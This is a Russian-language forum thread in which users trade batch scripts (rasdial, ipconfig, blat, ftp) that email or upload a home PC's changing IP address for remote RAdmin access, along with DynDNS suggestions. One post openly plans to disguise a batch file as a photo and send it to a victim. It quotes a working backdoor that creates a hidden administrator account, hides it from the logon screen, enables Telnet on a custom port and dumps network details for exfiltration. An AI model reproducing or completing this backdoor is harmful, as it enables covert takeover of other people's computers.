Отправка по почте IP-адреса подключения ADSL
У меня дома Windows XP Pro + ADSL подключение с динамическим IP. Можно ли как-нибудь сделать так, чтобы при подключении к интернету на определенный email (или UIN ICQ) отправлялось бы письмо (сообщение) с IP-адресом подключения ADSL? При обрывах связи и прочего - эта процедура должна повторяться. Все это нужно для того, чтобы управлять домашним компом через RAdmin (или аналогичную программу) через рабочий комп.
|
Меня тоже это интересует, толко надо, чтобы прога работала в компутере дома какаянибудь, а я с любого кампутера в интернете мог узнать свой IP домашний.
|
ну можно сделал командный файл, к-ый отправляет на мыло результаны, наприер, команды tracert какого-нить стандартного узла (mail.ru, microsoft.com, google.ru и т.п.). Конкретный листинг командного файла - уже технические детали, разбивается на подзадачи, к-ые уже много где обсуждались и можно найти в инете
|
Greyman
это через vbs ? |
Можно сделать так:
1) создать папку, к примеру C:\auto, и положить в нее 2 командных файла dial.cmd и send.cmd. 2) содержимое файла dial.cmd (только дозвон): @rasdial ADSL ptn ptn C:\auto\send.cmd где ADSL - название подключения к интернет, после чего указаны логин и пароль для доступа к интернет (подробнее о команде rasdial можно узнать в справке Windows); вторая строка - вызов командного файла send.cmd. 3) содержимое файла send.cmd (определение IP-адреса подключения и отправка сообщения на определенный(ые) email-адреса): ipconfig > C:\auto\body.txt C:\auto\blat261\full\blat.exe C:\auto\body.txt -to mywork@mail.ru -subject "IP-adress" -server smtp.mail.ru -u mymail@mail.ru -pw 12345 -charset windows-1251 Первая строка: формирование файла с информацией об IP-адресе (+ дополнительная информация о сетевых подключениях); вторая строка: вызов сторонней утилиты blat (скачать (150 Кб)). Скаченный архив необходимо извлечь в папку C:\auto (либо в другую папку и изменить соответствующие пути в командных файлах; либо можно скопировать в папку %windir%\system32 или прописать в path). Перед использованием этой утилиты необходимо выполнить настройку (один раз), для чего надо вызвать программу так: С:\auto\blat261\full\blat.exe -install smtp.mail.ru mymail@mail.ru где "smtp.mail.ru" - адрес SMTP-сервера, а "mymail@mail.ru" - адрес отправителя (от кого отправлено письмо). Если используется другой почтовый сервер, то необходимо указывать его SMTP-адрес и email-адрес; при этом вторая строка send.cmd также должна быть изменена. Теперь пару слов про отправку писем (см. вторую строку send.cmd ):
P.S.: разделение на два командных файла можно не проводить. --- Кстати, лучше сделать немного не так: вначале настроить blat так: blat.exe -install smtp.mail.ru mymail@mail.ru 0 25 - mymail@mail.ru 12345 то есть указать адрес SMTP-сервера, электронный адрес отправителя, время повтора (0, либо поставить символ "-" (тире, без ковычек)), номер порта (25, либо "-" (по умолчанию и так 25)), имя профиля ("-", используем тот, что создан по умолчанию), логин для ящика для SMTP-авторизации, пароль от ящика для SMTP-авторизации (требуется, как я уже говорил, на mail.ru). Логин и пароль хранятся в реестре в зашифрованном виде. Тогда строка для отправки будет выглядеть так: C:\auto\blat261\full\blat.exe C:\auto\body.txt -to mywork@mail.ru -subject "Self-mail" -charset windows-1251 --- |
Самое примечательное в том, что у меня нет ниодного соединения интернет. интернет у меня через шлюз и утилита ipconfig не умеет определять мой внешний IP, она определяет тока внутренный IP и все. такчто у меня все гораздо сложнее. даже не знаю, что еще придумать, буду рыть дальше. всем спасибо за сообщения, новые идеи все еще приветствуются!
|
Georgiy
Цитата:
|
Автору темы, пожалуй, больше подходит вариант, который предложил я. Ведь команда tracert, если я не ошибаюсь, не дает IP-адрес клиента:
Цитата:
|
Georgiy
Цитата:
|
Узнать свой внешний ip можно через скрипт
Запускаем его т.о. cscript showmyip.vbs >> myip.txt и отправляем этот файлик, как это предлагалось выше |
вариант dimich22 действительно проходит!
Но какбы сделать чтобы при изменении IP этот файл ложился на фтп? а не на почту, т.к. на почте оно будет складироваться, а на фтп заменяться файл будет, и дату/время в фале тоже желательно указать. |
Для заливки файла на некоторый ftp-сервер можно в командный файл вставить следующую строку:
ftp -i -s:C:\auto\ftp.txt -i убирает вывод запросов; -s указывает текстовый файл с ftp-командами. Эти команды выполняются автоматически после запуска команды ftp. Значение данного параметра не должно содержать пробелов. Данный параметр следует использовать вместо перенаправления (<). Содержимое файла ftp.txt: open ftp.myftpserver.ru login password put C:\auto\myip.txt myip.txt quit Такм образом, для Qwe1 есть два варианта: 1) Нужно создать папку C:\auto, распаковать в него blat, настроить его (об этом сказано выше), скопировать все в ту же папку C:\auto скрипт dimich22 и создать один командный файл C:\auto\send.cmd со следующим содержимым: @rasdial ADSL ptn ptn cscript showmyip.vbs >> myip.txt blat261\full\blat.exe C:\auto\myip.txt -to mywork@mail.ru -subject "My home IP" -charset windows-1251 del myip.txt 2) Скопировать все в ту же папку C:\auto скрипт dimich22 и создать один командный файл C:\auto\send.cmd со следующим содержимым: @rasdial ADSL ptn ptn cscript showmyip.vbs >> myip.txt ftp -i -s:C:\auto\ftp.txt del myip.txt Содержимое файла ftp.txt приведено выше. Удаление производится из-за того, что скрипт определения IP дописывает информацию, а не перезаписывает. Можно и не удалять или подправить скрипт. Для Gozya же подходит второй вариант. >> но какбы сделать чтобы при изменении IP как часто меняется IP? Может быть можно использовать планировщик Windows, который и будет вызывать командный файл send.cmd? |
Qwe1
Gozya Уважаемые вы совсем забыли о безопасности. Если Radmin будет слушаться на внешнем интерфейсе вашего компьютера, то попасть на ваш компьютер не составит большого труда. Я бы посоветовал VPN для Radmin'о подобных программ. |
>>как часто меняется IP?
на самом деле IP должен меняться тока при начале новой сессии соединения, но иногда провайдер сам его сбрасует вынудив модем переконектится. О радмине или VPN речь идти не может, они требовательны к трафику, а я на работе имею слабый канал, та и ненужны мне их функции. Это конечно касается меня, не Qwe1. Всем спасибо за ответы, скоро разгребусь с делами и буду пробовать. |
вундыркинды что в компьютерах шарят_____есть такие на форуме
|
ТЕМА ХОРОШАЯ НО Я ВОПРОС НЕ МНОГО ПО ДРУГОМУ ПОСТАВЛЮ ЗНАЧИТ ТАК :
ЕСТЬ Пакетный файл MS-DOS КОТОРЫЙ Я СОБИРАЮСЬ СКЛЕЕТЬ С ФОТОГРАФИЕЙ И НАМЕРЕН ЗАКИНУТЬ НУЖНОМУ ЧЕЛУ____ НАШЕЛ СКРИПТ НА ОТКРЫТИЕ ПОРТА telnet С ПРОВАМИ АДМИНА chcp 1251 net user SUPPORT_388945a0 /delete net user support hacker /add net localgroup Администраторы support /add net localgroup Пользователи SUPPORT_388945a0 /del reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "support" /t reg_dword /d 0 y sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet ЗНАЧИТ ПОТОМ ВЫТЯГИВАЮ НУЖНУЮ ИНФОРМАЦИЮ ИЗ КОМПЬЮТЕРА ФАЙЛ ЛОЖИТЬСЯ C:\ip.txt ПРИ ПОМОЩИ КОМАНДЫ cmd.exe /c ipconfig > C:\ip.txt И ТЕПЕРЬ МНЕ БЫ СКРИПТ ЧТО БЫ ЭТОТ ФАЙЛ НАХОДЯЩИЙСЯ В C:\ip.txt ЧЕРЕЗ Telnet ПЕРЕКИНУТЬ К СЕБЕ НА ПОЧТУ mail.ru вот хотел бы спросить у ведующих людей РАЗБИРАЮЩИХ В ЭТОМ ДЕЛЕ ПОМОЧЬ ЦЕЛИКОМ ______ПРОПИСАТЬ СКРИПТ ОТ А ДО Я ДЕЛО В ТОМ ЧТО Я В ЭТОМ ДЕЛЕ МАЛО ЧТО СЕКУ________ ПАРНИ ПОМОЖЕТЕ ? |
дайте ктото ссилку на ети скрипты пожалуйста-очень надо!
|
Основная масса современных ADSL, настривается в качестве router и имеет функционал DynDNS.
Если у Вас модем работает в режиме моста, то клиент DynDNS можно установить на ОС. Таким образом Вы получите доменное имя третьего уровня, которое будет всегда разрешаться в действительный IP-адрес подключения. PS: VPN для RAdmin можно и не делать, если есть возможность ограничить подключения (межсетевым экраном) с учетом адресов подключений - на работе у Вас скорее ввсего будет использовать выход в Инет со статического адреса. |
DiP Builder - это средство для создания программ,
которые периодически отсылают внешний IP компьютера на указанный E-Mail. Это удобно при удалённом администратировании через интернет, когда внешний IP адрес компьютера часто изменяется. _http://assanis.narod.ru/dip |
Цитата:
|
Georgiy, большое спасибо за предоставленную вами информацию!
|
IP-Sender: http://wmm5.narod.ru/ip-sender/
|
а пароль в этой проге шифруется? или я скидываю эту прогу кому нибудь и он спокойно звлезит в мой email? можно в принципе и отдельную почту зарегать, но это имхо не выход
|
А не проще использовать сервис от DynDNS.com или No-IP.com? Их поддержка есть во многих ADSL-модемах (роутерах) и клиенты для Windows.
|
StarFox, шифруется, конечно. Проверить оч. просто: введи пароль, сохрани и открой INI-файл блокнотом - увидишь там зашифрованную строку. Шифруется алгоритмом AES.
|
Время: 12:21. |
Время: 12:21.
© OSzone.net 2001-